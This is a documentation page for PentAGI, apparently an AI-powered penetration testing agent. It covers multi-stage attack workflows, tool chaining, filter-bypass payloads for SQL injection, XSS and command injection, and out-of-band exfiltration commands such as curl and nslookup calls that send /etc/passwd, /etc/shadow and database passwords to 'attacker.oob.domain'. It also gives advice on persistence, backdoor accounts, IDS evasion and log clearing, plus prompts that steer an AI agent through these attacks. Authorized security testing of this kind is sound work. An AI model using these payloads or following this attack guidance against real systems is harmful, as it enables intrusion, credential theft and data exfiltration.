Skip to main content

Overview

This guide covers advanced penetration testing techniques using PentAGI’s AI-powered capabilities. Learn how to chain tools, develop custom exploits, bypass security controls, and conduct sophisticated multi-stage attacks.
These techniques should only be used on systems you own or have explicit written authorization to test. Misuse may violate laws and regulations.

Multi-Stage Attack Workflows

PentAGI excels at orchestrating complex, multi-stage attacks that adapt based on discovered information.

Reconnaissance to Exploitation Pipeline

1

Initial reconnaissance

Perform comprehensive reconnaissance on target network 10.10.10.0/24:

1. Passive information gathering:
   - DNS enumeration
   - WHOIS lookups
   - Public records search
   - Certificate transparency logs

2. Active scanning:
   - Host discovery with nmap ping sweep
   - Port scanning all discovered hosts
   - Service version detection
   - OS fingerprinting

3. Service enumeration:
   - HTTP/HTTPS services: technology stack, CMS detection
   - SMB services: share enumeration, user lists
   - SSH services: supported authentication methods
   - Database services: version detection, default credentials
2

Vulnerability identification

Based on discovered services, identify vulnerabilities:

1. For each HTTP/HTTPS service:
   - Run nikto web scanner
   - Directory brute-forcing with gobuster
   - Identify authentication mechanisms
   - Check for known CVEs in detected software

2. For each database service:
   - Test for default credentials
   - Check for SQL injection in application endpoints
   - Identify database version-specific vulnerabilities

3. For each SMB service:
   - Enumerate shares and permissions
   - Test for null session access
   - Check for MS17-010 (EternalBlue) vulnerability
3

Exploitation

Prioritize and exploit identified vulnerabilities:

1. Attempt authentication bypass:
   - SQL injection in login forms
   - LDAP injection
   - Default or weak credentials

2. Remote code execution:
   - Exploit vulnerable services with metasploit
   - Upload web shells through file upload vulnerabilities
   - Leverage command injection flaws

3. Privilege escalation:
   - Search for SUID binaries
   - Check kernel version for known exploits
   - Examine sudo configuration
   - Look for scheduled tasks with weak permissions
4

Post-exploitation

Establish persistence and expand access:

1. Maintain access:
   - Create backdoor user accounts
   - Install SSH keys
   - Deploy reverse shells

2. Lateral movement:
   - Extract credentials from memory
   - Crack password hashes
   - Use compromised credentials on other systems
   - Exploit trust relationships

3. Data exfiltration:
   - Identify sensitive data locations
   - Compress and encrypt data
   - Use covert channels for exfiltration

Tool Chaining Strategies

Combine multiple tools for more effective testing.

Web Application Attack Chain

Chain web testing tools for comprehensive coverage:

# Phase 1: Discovery
1. Use gobuster to discover directories and files:
   - Identify admin panels
   - Find backup files (.bak, .old)
   - Locate configuration files

# Phase 2: Technology fingerprinting
2. Analyze discovered resources:
   - Identify frameworks and CMS
   - Detect WAF/IPS presence
   - Map API endpoints

# Phase 3: Vulnerability scanning
3. Run targeted scans based on technology:
   - WPScan for WordPress
   - Droopescan for Drupal
   - nikto for generic vulnerabilities

# Phase 4: Manual testing
4. Test identified input vectors:
   - SQL injection with sqlmap
   - XSS in forms and parameters
   - CSRF on state-changing operations
   - File upload vulnerabilities

# Phase 5: Exploitation
5. Exploit confirmed vulnerabilities:
   - Upload web shell
   - Execute remote commands
   - Access database
   - Extract credentials

Network Pivot Chain

Progressive network penetration:

# Stage 1: External foothold
1. Compromise internet-facing server:
   - Exploit web application vulnerability
   - Gain shell access
   - Identify network configuration

# Stage 2: Network enumeration
2. Map internal networks from compromised host:
   - Scan internal IP ranges
   - Identify routing and VLANs
   - Discover additional services

# Stage 3: Credential harvesting
3. Extract credentials from compromised system:
   - Dump password hashes
   - Extract browser credentials
   - Find configuration files with passwords
   - Monitor network for cleartext credentials

# Stage 4: Lateral movement
4. Use credentials to access internal systems:
   - Test credentials on all discovered services
   - Exploit trust relationships
   - Use compromised domain account

# Stage 5: Privilege escalation
5. Escalate to domain admin:
   - Kerberoasting attacks
   - NTLM relay attacks
   - Exploit vulnerable services
   - Abuse misconfigured permissions

Custom Exploit Development

PentAGI can develop custom exploits and payloads tailored to specific scenarios.

Bypass Technique Development

1

WAF bypass for SQL injection

Develop custom SQL injection payload to bypass WAF:

1. Analyze WAF behavior:
   - Test standard payloads
   - Identify blocked patterns
   - Determine filter rules

2. Craft bypass techniques:
   - URL encoding: %27 instead of '
   - Double encoding: %2527
   - Unicode encoding: \u0027
   - Comment injection: /**/
   - Case variation: SeLeCt
   - Inline comments: SEL/*comment*/ECT

3. Test variations:
   - Combine multiple techniques
   - Use database-specific syntax
   - Leverage timing differences

Example bypasses:
- Standard: ' OR 1=1--
- Encoded: %27%20OR%201=1--
- Commented: '/**/OR/**/1=1--
- Unicode: \u0027 OR 1=1--
2

XSS filter evasion

Create XSS payloads that evade input filters:

1. Test filter strength:
   - Basic tags: <script>
   - Event handlers: onerror, onload
   - JavaScript URIs: javascript:

2. Develop evasion techniques:
   - Unusual tags: <math>, <svg>, <details>
   - Alternate attributes: ontoggle, onanimationstart
   - Encoding: HTML entities, hex, octal
   - Case manipulation: <ScRiPt>
   - Null bytes: <script\x00>

Advanced payloads:
- <svg/onload=alert(1)>
- <img src=x onerror=alert(1)>
- <details open ontoggle=alert(1)>
- <body onpageshow=alert(1)>
- <input onfocus=alert(1) autofocus>
3

Command injection with IFS bypass

Bypass space filtering in command injection:

1. Identify space filtering:
   - Test: command with spaces
   - Blocked: command injection attempts

2. Alternative separators:
   - IFS: ${IFS}
   - Tab: %09 or \t
   - Newline: %0a or \n
   - Brace expansion: {cat,/etc/passwd}

Examples:
- cat${IFS}/etc/passwd
- cat$IFS/etc/passwd
- cat</etc/passwd
- {cat,/etc/passwd}
- cat${IFS}${PATH:0:1}etc${PATH:0:1}passwd

Out-of-Band (OOB) Attack Techniques

Leverage PentAGI’s OOB capabilities for blind vulnerabilities.

Blind SQL Injection with OOB

Exploit blind SQL injection using DNS lookups:

1. Set up OOB listener:
   - PentAGI provides dedicated ports (28000-30000)
   - Use Interactsh or Burp Collaborator

2. Craft DNS exfiltration payload:
   For MySQL:
   ' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT+password+FROM+users+LIMIT+1),'.attacker.oob.domain\\share')) --
   
   For MSSQL:
   '; EXEC master..xp_dirtree '\\'+@@version+'.attacker.oob.domain\\share' --
   
   For PostgreSQL:
   '; COPY (SELECT password FROM users) TO PROGRAM 'nslookup `cat /etc/passwd | base64`.attacker.oob.domain' --

3. Monitor OOB channel:
   - Watch for DNS queries
   - Extract data from subdomain
   - Decode base64 if encoded

Blind Command Injection with OOB

Verify blind command injection using HTTP callbacks:

1. Inject callback payload:
   ; curl http://attacker.oob.domain:28000/`whoami`
   ; wget http://attacker.oob.domain:28000/$(id)
   ; ping -c 1 $(hostname).attacker.oob.domain

2. For Windows targets:
   & nslookup %COMPUTERNAME%.attacker.oob.domain
   & certutil -urlcache -split -f http://attacker.oob.domain:28000/%USERNAME%

3. Exfiltrate data:
   ; curl -d @/etc/passwd http://attacker.oob.domain:28000/
   ; cat /etc/shadow | base64 | curl -d @- http://attacker.oob.domain:28000/

Blind SSRF Detection

Detect SSRF vulnerabilities with OOB callbacks:

1. Test common SSRF vectors:
   - URL parameters: ?url=http://attacker.oob.domain:28000
   - Image sources: <img src="http://attacker.oob.domain:28000">
   - PDF generators: invoice_url=http://attacker.oob.domain:28000
   - Webhooks: callback_url=http://attacker.oob.domain:28000

2. Try protocol variations:
   - http://attacker.oob.domain:28000
   - https://attacker.oob.domain:28000
   - ftp://attacker.oob.domain:28000
   - file:///etc/passwd
   - gopher://attacker.oob.domain:28000

3. Bypass filters:
   - IP encoding: http://2130706433/ (127.0.0.1)
   - Hex encoding: http://0x7f.0x0.0x0.0x1/
   - Octal: http://0177.0000.0000.0001/
   - URL shorteners: http://short.url/abc
   - DNS rebinding: http://attacker.oob.domain/

Memory and Context Management

Leverage PentAGI’s memory systems for complex engagements.

Using Vector Store for Pattern Recognition

Instruct PentAGI to leverage its memory:

"Before testing, search your memory for:
1. Similar applications tested in the past
2. Successful exploitation techniques
3. Common misconfigurations in this technology
4. Bypass techniques that worked before

Use these patterns to optimize your testing approach."
PentAGI will:
  • Query vector store for semantic matches
  • Retrieve successful attack patterns
  • Apply learned techniques to current target
  • Adapt based on what worked previously

Knowledge Graph Integration

When Graphiti is enabled:
"As you test, build a knowledge graph of:
1. Target infrastructure relationships
2. Vulnerability dependencies
3. Tool effectiveness for different scenarios
4. Authentication bypass chains

Use this graph to identify:
- Attack path optimization
- Credential reuse opportunities
- Trust relationship exploitation
- Lateral movement vectors"
Benefits:
  • Automatic relationship discovery
  • Complex query patterns (e.g., “What tools work against this service version?”)
  • Temporal tracking of attack progression
  • Reusable attack patterns across engagements

Advanced Prompt Engineering

Conditional Testing Logic

Test web application at http://target.com with adaptive logic:

IF (application uses authentication):
  1. Test for authentication bypass
  2. Attempt credential brute-forcing with common passwords
  3. Check for session management vulnerabilities
  IF (authentication successful):
    - Test authenticated functionality
    - Look for privilege escalation
  ELSE:
    - Continue with unauthenticated testing

IF (application accepts file uploads):
  1. Test for unrestricted file upload
  2. Try uploading web shells with various extensions
  3. Attempt MIME type bypass
  IF (file upload successful):
    - Access uploaded file
    - Attempt remote code execution

IF (SQL injection found):
  1. Determine database type
  2. Extract database schema
  3. Dump user credentials
  4. Test for administrative access
  IF (admin credentials obtained):
    - Access admin panel
    - Attempt command execution through admin functions

Distributed Testing with Worker Nodes

Leverage distributed architecture for advanced scenarios.

Parallel Target Testing

Test multiple targets simultaneously:

"I have a list of 10 web applications to test.
For each application in parallel:

1. Perform reconnaissance
2. Identify technology stack
3. Run automated scanners
4. Test for common vulnerabilities

Aggregate results showing:
- Most vulnerable applications
- Common vulnerability patterns
- Recommended exploitation order
- Cross-application attack vectors"
Benefits:
  • Faster assessment of multiple targets
  • Resource isolation per target
  • Aggregated intelligence gathering

Network Segmentation Testing

Test network segmentation effectiveness:

"From compromised DMZ host:
1. Identify all accessible networks
2. For each network segment:
   - Map accessible hosts
   - Test firewall rules
   - Identify routing paths
   - Attempt VLAN hopping

3. Document:
   - Which segments can reach each other
   - Bypass techniques that work
   - Trust relationships discovered
   - Recommended pivot points"
Worker nodes provide:
  • Isolated network contexts
  • Dedicated OOB channels per segment
  • Secure credential storage per environment

Performance Optimization

Token Usage Optimization

  • Use simple agents for reconnaissance (lower token cost)
  • Reserve reasoning models for complex decisions
  • Disable agent delegation for focused, single-tool tasks
  • Leverage summarization for long engagements
"Run nmap scan but only report:
- Open ports with vulnerable services
- Hosts with weak credentials
- Systems missing critical patches

Do not include:
- Closed ports
- Standard service configurations
- Expected security controls"

"Test incrementally:
1. Start with quick wins (default credentials, known CVEs)
2. If successful, proceed to deeper testing
3. If unsuccessful after 10 minutes, move to next target

Report only actionable findings."

Security Considerations

Operational Security
  • Always use worker nodes for untrusted code execution
  • Isolate testing environments from production networks
  • Rotate OOB callback domains regularly
  • Clear sensitive data from memory after tests
  • Use encrypted communications for data exfiltration testing
"Conduct testing with stealth in mind:
- Throttle scan rates to avoid IDS/IPS
- Randomize user agents and request patterns
- Use time delays between requests
- Avoid obvious attack signatures
- Clear logs where possible (authorized testing only)"

"For each exploit attempt:
- Save exact commands executed
- Capture full responses
- Screenshot successful exploits
- Record timestamps
- Note any system modifications

This evidence supports reporting and remediation."

Next Steps

Best Practices

Security and ethical guidelines

Custom Assistants

Configure specialized testing agents

Distributed Setup

Scale with worker nodes

Provider Configuration

Optimize model performance

Build docs developers (and LLMs) love

Get started for freeTalk to us